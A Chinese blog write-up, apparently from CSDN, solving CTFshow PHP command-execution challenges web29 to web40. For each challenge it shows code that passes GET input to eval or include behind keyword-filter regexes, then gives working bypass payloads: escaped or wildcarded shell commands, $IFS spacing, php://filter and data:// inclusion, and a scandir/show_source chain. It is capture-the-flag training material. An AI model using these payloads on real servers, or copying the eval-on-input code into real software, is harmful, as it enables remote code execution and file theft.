CTFshow 命令执行 web29-web40

已于 2023-06-26 15:07:35 修改
阅读量272 收藏
点赞数 1
文章标签: php
于 2023-06-25 22:30:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73121489/article/details/131386981
版权
文章系列介绍了多个基于PHP的Web安全问题,涉及eval函数的使用以及如何绕过过滤机制执行命令。通过正则表达式过滤关键词如flag,system,php等,但通过各种技巧如使用printf,passthru,反斜杠转义,数据URIscheme,文件包含函数等方法可以规避限制,执行想要的命令或获取文件内容。
摘要由CSDN通过智能技术生成

文章目录

web 29

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

很简单,就过滤了flag
?c=system("ls");
?c=system("tac fla\g.php");

web 30

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了system,php,flag
法一:
passthru("ls");
passthru("tac fla*");
法二:
printf或echo
?c=printf(\`ls\`);
?c=printf(\`tac fla\g.ph\p\`);或者?c=printf(\`tac fla*\`);

web 31

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

?c=printf(\`ls\`);
?c=printf(\`tac\$IFS\$9fla*\`);

web 32

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了反引号、左括号和分号,passthru、printf和echo都用不了,取反绕过也不行,
分号得用 ?>
新姿势:嵌套文件包含
payload:
?c=include%0a$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
base64解码即得flag

web 33

和web32一个解法
如果include被过滤了,可以用require来代替,反正就是文件包含的函数。

web 34 和web 35

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

和web32一个解法

web 36

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这题解法也差不多,数字换成字母就可以了
?c=include%0a$_GET[x]?>&x=php://filter/read=convert.base64-encode/resource=flag.php

web 37

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

涉及到一点文件包含,只过滤了flag
法一:php://input
BP抓包,用HackBar传参之后没有内容回显
POST传<?php echo system("ls"); ?>
在这里插入图片描述

再传<?php echo system("tac flag.php"); ?>

在这里插入图片描述
法二:data协议

web 38

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

多过滤了php和file,PHP伪协议用不了,只能用data协议
1.短标签
?c=data://text/plain,<?=system("tac f*")?>
2.base64编码
c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==
然后在源码里就可以看到flag。

web 39

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

?c=data://text/plain,<?php echo system("tac f*");?>

web 40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

getcwd() 函数返回当前工作目录。它可以代替pos(localeconv())

localeconv():返回包含本地化数字和货币格式信息的关联数组。
  这里主要是返回值为数组且第一项为"."

pos():输出数组第一个元素,不改变指针;

current() 函数返回数组中的当前元素(单元),默认取第一个值,和pos()一样

scandir() 函数返回指定目录中的文件和目录的数组。这里因为参数为 . 所以遍历当前目录

array_reverse():数组逆置

next():将数组指针指向下一个,这里其实可以省略倒置和改变数组指针,
直接利用[2]取出数组也可以

show_source():查看源码

pos() 函数返回数组中的当前元素的值。该函数是current()函数的别名。

每个数组中都有一个内部的指针指向它的"当前"元素,初始指向插入到数组中的第一个元素。

提示:该函数不会移动数组内部指针。

?c=var_dump(scandir(current(localeconv())));
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));

去选择自己的路
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow 命令执行 web40
Kradress的博客
10-30 1713
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
CTFshow--web入门--命令执行29--55)
weixin_53425135的博客
11-23 2521
CTFshow–web入门 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,可以使用通配符进行绕过 : ?c=system(‘cat f*’); web30 <?p
ctfshow命令执行web29
m0_62584974的博客
04-04 790
2022/4/3 先查看文件有多少个 ?c=system('ls'); 先执行再访问 ?c=system("cp flag.php 1.txt"); 没执行成功,因为关键字flag被过滤了 把flag的g换成? ?c=system("cp fla?.php 1.txt"); ?是占位符占一个位置,*占多个 ...
CTFshow web入门 web29-------web56 命令执行wp
最新发布
2202_75289892的博客
07-30 347
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
ctfshow-命令执行-web29
weixin_43400535的博客
10-28 1558
ctfshow-web30 题目描述: 原理: isset() 函数 用于检测变量是否已设置并且非 NULL。 如果已经使用 unset() 释放了一个变量之后,再通过 isset() 判断将返回 FALSE。 若使用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。 同时要注意的是 null 字符("\0")并不等同于 PHP 的 NULL 常量 语法:bool isset ( mixed $var [, mixe
CTFSHOW web入门——web40
m0_74093152的博客
04-24 563
并且这道题使用到了eval函数(返回传入字符的表达式的结果。即将字符串当成有效的表达式,进行运算、求值并返回结果。构造payload:?过滤了一堆符号,但过滤的括号是中文的括号,所以还是可以正常使用英文括号的。并post参数:b=system(''tac flag.php)可以使用套娃去获得flag.php文件的内容。
ctfshow-web40(命令执行)
m0_62094846的博客
01-22 6154
current() prev() next() reset() end() <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer....
ctfshow 命令执行 web37-40
qq_44893894的博客
11-27 889
web37 关键代码: if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中。 伪协议中的data://,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行 data://协议用法: data://text/plain,
ctfshow web入门 命令执行web29-web57详解
2401_84009597的博客
04-12 668
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
CTFSHOW命令执行web入门29-54
m0_73605862的博客
02-09 1993
这里就记录一下ctfshow的刷题记录是web入门的命令执行专题里面的题目,他是有分类,并且覆盖也很广泛,所以就通过刷这个来,不过里面有一些脚本的题目发现我自己根本不会笑死。如果还不怎么知道写题的话,可以去看我的gitbook,当然csdn我也转载了我自己的文章。如果你能去我的github为我的gitbook项目点亮星星或者follow me 那我将更开心。并且github和gitbook里面更详细,有更多关于web安全方面的知识,观感也会更好o。
ctf.show_web40(命令执行)
高高同学
03-01 720
web40无参数RCE绕过 源码 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highligh
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1603
CTFshow 命令执行 web29 web30 web31
CTFSHOW web入门——web29
m0_74093152的博客
04-23 235
preg_match正则匹配,如果输入的c中含有flag字段就不会将c作为代码执行,即过滤flag。构造payload:?用GET方式获取参数c,然后利用eval函数将c作为代码执行。查看网页源代码获得flag。
【CTFshow】命令执行web29-web54
weixin_51614272的博客
02-23 2746
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
命令执行--ctfshow web29
yxlr_beta的博客
09-29 150
1:PHP 在线工具 | 菜鸟工具 PHP中preg_match正则匹配的/u /i /s是什么意思 /u 表示按unicode(utf-8)匹配(主要针对多字节比如汉字) /i 表示不区分大小写(如果表达式里面有 a, 那么 A 也是匹配对象) /s 表示将字符串视为单行来匹配 Q:web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/fla...
ctfshow-WEB入门-命令执行WEB29~WEB44)
weixin_40103894的博客
11-28 657
ctfshow-WEB入门-命令执行WEB29~WEB44)
ctfshow-web29(命令执行)
m0_62094846的博客
01-21 168
? 可以代替一个字符 *可以代替多个字符 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0);
【CTFWP】ctfshow-web40
LongL_GuYu的博客
07-30 931
CTFWP:ctfshow-web40
ctfshow-web入门-命令执行-web29
HkD01L的博客
06-21 329
ctfshow,命令执行web29
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值